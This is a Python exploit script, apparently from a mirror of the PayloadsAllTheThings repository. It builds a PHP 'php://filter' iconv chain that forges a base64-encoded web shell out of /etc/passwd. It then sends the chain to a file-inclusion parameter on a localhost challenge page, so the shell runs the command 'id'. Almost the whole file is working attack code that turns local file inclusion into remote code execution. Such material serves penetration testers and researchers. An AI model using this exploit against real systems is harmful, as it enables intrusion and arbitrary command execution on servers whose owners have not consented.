mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
60 lines
No EOL
3.1 KiB
Python
60 lines
No EOL
3.1 KiB
Python
import requests
|
|
|
|
url = "http://localhost:8000/chall.php"
|
|
file_to_use = "/etc/passwd"
|
|
command = "id"
|
|
|
|
#<?=`$_GET[0]`;;?>
|
|
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
|
|
|
|
conversions = {
|
|
'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
|
|
'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
|
|
'C': 'convert.iconv.UTF8.CSISO2022KR',
|
|
'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
|
|
'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
|
|
'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
|
|
's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
|
|
'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
|
|
'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
|
|
'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
|
|
'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
|
|
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
|
|
'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
|
|
'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
|
|
'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
|
|
'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
|
|
'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
|
|
'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
|
|
}
|
|
|
|
|
|
# generate some garbage base64
|
|
filters = "convert.iconv.UTF8.CSISO2022KR|"
|
|
filters += "convert.base64-encode|"
|
|
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
|
|
filters += "convert.iconv.UTF8.UTF7|"
|
|
|
|
|
|
for c in base64_payload[::-1]:
|
|
filters += conversions[c] + "|"
|
|
# decode and reencode to get rid of everything that isn't valid base64
|
|
filters += "convert.base64-decode|"
|
|
filters += "convert.base64-encode|"
|
|
# get rid of equal signs
|
|
filters += "convert.iconv.UTF8.UTF7|"
|
|
|
|
filters += "convert.base64-decode"
|
|
|
|
final_payload = f"php://filter/{filters}/resource={file_to_use}"
|
|
|
|
with open('payload', 'w') as f:
|
|
f.write(final_payload)
|
|
|
|
r = requests.get(url, params={
|
|
"0": command,
|
|
"action": "include",
|
|
"file": final_payload
|
|
})
|
|
|
|
print(r.text) |